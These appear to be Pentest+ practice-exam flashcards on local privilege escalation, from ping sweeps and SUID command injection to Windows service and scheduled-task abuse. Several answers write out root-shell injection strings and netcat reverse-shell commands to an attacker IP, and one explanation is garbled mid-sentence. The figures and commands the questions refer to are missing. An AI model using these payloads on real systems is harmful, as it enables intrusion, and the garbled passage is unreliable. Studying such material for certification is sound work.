Pentest+ Practice Exam Chapter 10 Attacking Local Host Vulnerabilities (Jonanthan Ammerman) Flashcards
Consider the following bash one-liner command for the first six questions.
- What is the effect of the string {1..254} in this command?
A. Indicates that the numbers 1 and 254 should be fed into the command for $i
B. Indicates that all integers between 1 and 254 should be fed into the command for $i at once C. Indicates that all integers from 1 to 254 should be iteratively fed into the command for $i
D. Indicates that every other integer starting from 1 should be fed iteratively into the command for $i, stopping once it reaches at least 254
C. Indicates that all integers from 1 to 254 should be iteratively fed into the command for $i
Explanation:
This is an example of a for loop—a command flow statement that indicates that all commands that follow should be executed repeatedly and iteratively “for” all possible values of a variable (i, in this case). The string {1..254} indicates a number sequence starting with 1 and ending at 254; for more information on this sequencing technique, search for “bash brace expansion” in your favorite search engine. A, B, and D are incorrect. A is incorrect because the {1..254} component indicates that all numbers from 1 to 254 should be fed into the command iteratively. A number sequence would be unnecessary for so few numbers; a simpler for loop setup in this case would be for i in 1 254. B is incorrect because a for loop necessarily indicates
Location: 7036
iteration; the command string will be run individually for each number in the sequence, stopping only once the sequence has been exhausted. D is incorrect because the brace expansion construct does not indicate that any number skipping should occur. A number sequence matching answer D would be {1..254..2}.
What is the effect of the string 2>&1 in this command? A. Redirects STDOUT to a file named &1
B. Makes the ping command skip every second IP address in the numeric sequence
C. Redirects STDERR to STDOUT
D. Concatenates STDERR to STDOUT before writing to a file named &1
C. Redirects STDERR to STDOUT
Explanation:
This component redirects error messages (STDERR) to the terminal output (STDOUT). For more information on the techniques in use here, search for “bash file descriptors” and “bash redirection operators” in your favorite search engine.
A is incorrect for two reasons: file descriptor 2 refers to STDERR rather than STDOUT, and the > operator does not write output to a file when followed by an &; at that point, it is redirecting the contents of the initial file descriptor to the second file descriptor. B is incorrect because the ping sequencing is managed by the number sequence defined in the for loop. D is incorrect because, as in answer A, the “>&” operator pair redirects file descriptor flow rather than writing to a file.
What is the function of the || operator in this command sequence?
A. Indicates that the command that follows should only be run if the previous command is successful
B. Indicates that the output of the command before the operator should be directed to the following command as input
C. Indicates that the command that follows should only be run if the previous command has an exit code of 0
D. Indicates that the command that follows should only be run if the previous command does not execute successfully
D. Indicates that the command that follows should only be run if the previous command does not execute successfully
Explanation:
The || character is the OR logical operation operator. When the || operator is present, the command that follows is executed if and only if the command before it fails. For more information on the functions in play, search for “bash Boolean operators” in your favorite search engine.
A is incorrect because the behavior described matches the AND operator, designated by the character pair &&. The && operator’s presence indicates that the command that follows is executed if and only if the command preceding it is successful. B is incorrect because the behavior described matches the | operator, or pipe. C is incorrect because, as detailed in answer A, this behavior is expected when the && operator is used to connect two commands.
What is the effective result of this string of commands?
A. Pings assignable IP addresses in the 10.1.2.0/24 range with one packet, silences all output by redirecting it to /dev/null, and returns a simple message indicating whether or not the host is responding to ICMP requests
B. Pings assignable IP addresses in the 10.1.2.0/24 range for one minute, redirects all output to /dev/null, and returns two messages for each address—one saying the host is UP, the other saying the host is UNAVAILABLE
C. Pings a random IP address between 10.1.2.1 and 10.1.2.254 with one packet, silences all output by redirecting it to /dev/null, and returns a simple message indicating whether or not the host is available
D. Pings 10.1.2.1 and 10.1.2.254 for one minute each, silences all output by redirecting it to /dev/null, and returns a simple message indicating whether or not the host is available
A. Pings assignable IP addresses in the 10.1.2.0/24 range with one packet, silences all output by redirecting it to /dev/null, and returns a simple message indicating whether or not the host is responding to ICMP requests
Explanation:
The command presented will ping all assignable IP addresses from 10.1.2.1 to 10.1.2.254, silence all output, and print a simple message indicating whether or not the host is responding to ICMP requests. B, C, and D are incorrect. B is incorrect because the command sequence could not possibly print both commands for each host as written. Given that both the && and || operators rely on exit codes to determine logic flow, only one of those commands could run for any given IP address as generated by the brace expansion number sequence. C is incorrect
Location: 7098
because for loops run iteratively rather than select a random entry from the provided target list. D is incorrect because the for loop as written will necessarily address all IP addresses from 10.1.2.1 to 10.1.2.254. To only address those two IP addresses, the brace expansion component could be removed and the two IP addresses in question hardcoded in its place.
Assume that you know you are working with a /24 block of IP addresses, but you are uncertain which hosts are live. You want to minimize screen output to only print the IP addresses that are up and responding to pings. What modification could be made to this command in order to implement this change in output?
A. Delete the >/dev/null component of the sequence. B. Delete the || echo 10.1.2.$i UNAVAILABLE component of the sequence.
C. Add | nc -nv 10.1.3.2 4444 to the end of the command sequence.
D. Add > output.txt to the end of the command sequence.
B. Delete the || echo 10.1.2.$i UNAVAILABLE component of the sequence.
Explanation:
If the majority of the IP addresses in question are suspected to be unavailable, then removing the command that only prints to the terminal if a host does not respond to ICMP requests would be the most efficient means of minimizing output.
Which of the following commands are most useful in Linux privilege escalation when attempting to identify potential OS-specific vulnerabilities for exploit? (Choose two.) A. uname -r B. sudo -V C. cat /etc/*release D. sudo -l
A. uname -r
C. cat /etc/*release
Explanation:
A will return kernel version of a Linux host, facilitating a more focused search for kernel-level exploits. Answer C will return the specific release of a Linux host’s operating system, which can also help focus a search for an exploit path. B and D are incorrect. B is incorrect because sudo -V merely reports the version of sudo in use on a target host. Sudo is an application used to handle legitimate permission escalation, and the versions of sudo are not necessarily tied to given kernel or OS releases, making this incorrect. D is incorrect because sudo -l will only report the permissions available to a given user. Although this could potentially lead to privilege escalation through other means—writeable SUID applications, for instance, or write access to a script that runs as root—it is not going to present information that would help identify potential OS or kernel specific vulnerabilities, making it incorrect.
Which privilege escalation technique for *nix operating systems is notable for allowing attackers to control program execution on a target system without the need to write and deploy their own shellcode? A. Ret2libc B. NOP sled C. Heap spraying D. Stack smashing
A. Ret2libc
Explanation:
A ret2libc attack is a type of buffer overflow that exploits existing subroutines present in an application, making it unnecessary to write shellcode specifically for the attack. B, C, and D are incorrect. B is incorrect because a NOP sled (or NOP slide) is a technique used in buffer overflow attacks; the NOP instruction indicates that no action should be taken
by a processor, effectively sliding the instruction pointer further down the stack until it reaches an instruction pair that can be acted upon. C is incorrect because heap spraying is a technique used to facilitate other exploits. It consists of sending large blocks of bytecode to the memory of a target process (its heap), attempting to get a particular byte sequence into a specific location. D is incorrect because stack smashing is a subcategory of buffer overflow that occurs when a program writes data to memory that is not allocated for the data structure in question—for example, writing 80 characters to a 60-character buffer would “overflow” that buffer allotment.
Which of the following commands are most useful in Windows privilege escalation when attempting to identify potential OS-specific vulnerabilities for exploit? (Choose two.)
A. netsh firewall show config
B. systeminfo
C. wmic qfe
D. net users
B. systeminfo
C. wmic qfe
Explanation:
The systeminfo command returns details on the OS name, version, security hotfixes, and BIOS information for a given Windows host. When wmic—the Windows Management Interface CLI—is used with the qfe flag, it will provide further details on the hotfixes present on a target Windows system. Both commands can be immensely valuable in attempting to identify OS-specific vulnerabilities for exploit on a Windows host.
During a penetration test, you collect low-level authentication credentials for a Linux server via a phishing attack. After testing and verifying these credentials, you begin searching for ways to escalate your privilege level and discover the following. What configuration vulnerability is represented in this screen capture?
A. Insecure SUID/SGID use
B. Sticky bit abuse
C. Password stored in plaintext
D. Insecure sudo access
D. Insecure sudo access
Explanation:
The sudo -l command here reveals that the user has access to all commands as the root user without the need to enter a password. This is a blatant example of
insecure sudo access, although others may be worth noting. For instance, being able to run a writeable script as root without a password would also be an easy path to privilege escalation.
During a penetration test, you discover what appears to be a custom binary in a user’s home directory. What configuration vulnerability is most likely to be present in this scenario, as displayed here? A. Sticky bit abuse B. Insecure sudo access C. Unquoted service path D. Insecure SUID/SGID use
D. Insecure SUID/SGID use
Explanation:
The SUID bit is set for the owner (root) for the vulnerable_ping file. SUID binaries are always worth investigating for command injection or other vulnerabilities (especially when they run as the root user) when seeking paths for privilege escalation.
In the same directory mentioned in Question 10, you see what appears to be the .c file used to build the vulnerable executable in question. The contents of the file are shown next.
Based on the contents of this .c file, which of the following commands would likely result in privilege escalation via the compiled, root SUID binary? (Choose all that apply.)
A. ./vulnerable_ping “127.0.0.1 && /bin/dash”
B. ./vulnerable_ping “foo || sh -i”
C. ./vulnerable_ping “foo; /bin/bash”
D. ./vulnerable_ping 127.0.0.1; /bin/sh
A. ./vulnerable_ping “127.0.0.1 && /bin/dash”
B. ./vulnerable_ping “foo || sh -i”
Explanation:
A is correct because it sends a valid IP address to the ping command invoked by the application system() call, which will return with an exit code of 0. Since the command includes the AND operator (denoted by &&), the second command (/bin/dash—a lightweight shell used for init scripts in Ubuntu and other Linux distributions) will execute and provide the user with a EUID (Effective User ID) of 0, or root. B is correct because the command sends an invalid IP address (the string “foo”) to the ping command invoked by the application system() call, resulting in the command exiting with a nonzero exit code (indicating failure). Since the command string includes the OR operator (denoted by ||), the second command (shi) will execute, again providing the user with an EUID of 0. Note that in the case of both A and B, the argument sent to the application requires quotation marks. This treats the entire component as a single string, which is designated argv[1] by the application. Without quotation marks, whitespace would serve as a delineator separating separate command-line arguments (or argvs). In the case of A and B, for example, argv[1] would be “127.0.0.1” and “foo”, respectively.
The output shown here is from a Linux application debugging and fuzzing session while searching for potential exploitable buffer overflows. Of the following choices, which is the debugging tool most likely in use?
A. OLLYDBG
B. GDB
C. WinDBG
D. Immunity Debugger
B. GDB
Explanation:
The debugger shown in the screen presented is GDB, the Gnu Debugger. It is a command-line tool found on several *nix operating systems by default and supports numerous programming languages, including C, Objective-C, Fortran, and Java. While GDB does not have a native graphical interface, several have been created by third parties. In addition, numerous IDEs are able to interface with GDB directly.
Which method of attacking Windows systems exploits a weak encryption key used in Group Policy Objects to extract hardcoded user account passwords?
A. DLL hijacking
B. cpassword extraction
C. SAM database cracking
D. LSASS dumping
B. cpassword extraction
Explanation:
The cpassword attribute found in Group Policy Objects is a glaring security vulnerability due chiefly to the use of a static encryption key for all such entries as well as the open publication of the key used by Microsoft on its documentation pages. If a cpassword attribute is found in a Group Policy Object (found in the SYSVOL directory), it is as good as storing a password in plaintext.
Which method of attacking Windows family operating systems relies on remnants from the creation of a given system or server for privilege escalation?
A. Kerberoasting
B. Plaintext credential transmission via LDAP
C. Unattended installation artifact harvesting
D. cpassword extraction
C. Unattended installation artifact harvesting
Explanation:
In larger environments, it is common for administrators to automate OS creation in order to minimize the amount of busy work they have to handle manually. The issue here is that passwords can be left in documents that were a necessary part of the installation process—either in plaintext or encoded in base64.
Consider the following screenshots of a Windows privilege escalation attempt. What method of privilege escalation is being demonstrated with these changes?
A. Scheduled task abuse
B. Writeable service exploitation
C. DLL hijacking
D. Keylogging
B. Writeable service exploitation
Explanation:
This is a classic example of exploitation of a writeable service. Notice the binary path name change; instead of starting the svchost executable, a netcat reverse shell is configured to be called. Writeable services may be identified via the accesschk.exe executable, distributed with the NTLM hash of the account that owns the service. Kerberoasting tricks AD into providing a cryptographically weak ticket on which the attacker can then run a cracking attempt to obtain the account password.
Consider the following scheduled task in a Windows environment for which you have low-privilege access. Upon investigation, you find that the .bat file referenced can be modified by anyone and contains the following commands: cd “C:\Program Files\Rails_Server” C:\tools\ruby23\bin\rails.bat server You have already managed to smuggle a copy of nc.exe onto the target system at C:\Users\user\Desktop. Assuming your attacking IP is 10.1.2.2 and you have a netcat listener set up on port 80, which of the following actions would be the least invasive method to effect reliable privilege escalation?
A. Append “& C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe” to the end of the line
B. Append “&& @start C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe” to the end of the line
C. Overwrite the file contents with “C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe”
D. Insert “@start /b C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe &” into the command sequence, between the directory change and the rails.bat call
D. Insert “@start /b C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe &” into the command sequence, between the directory change and the rails.bat call
Explanation:
Notice that the question referred to the least invasive method: by using the @start command directive, the netcat component of this batch file will run asynchronously in a separate command process, allowing the user-defined rails.bat call to continue to run. This will effectively ensure that the reverse shell calls home, while the legitimate user sees their rails server running, making them more likely to believe that all is well with their scheduled task.
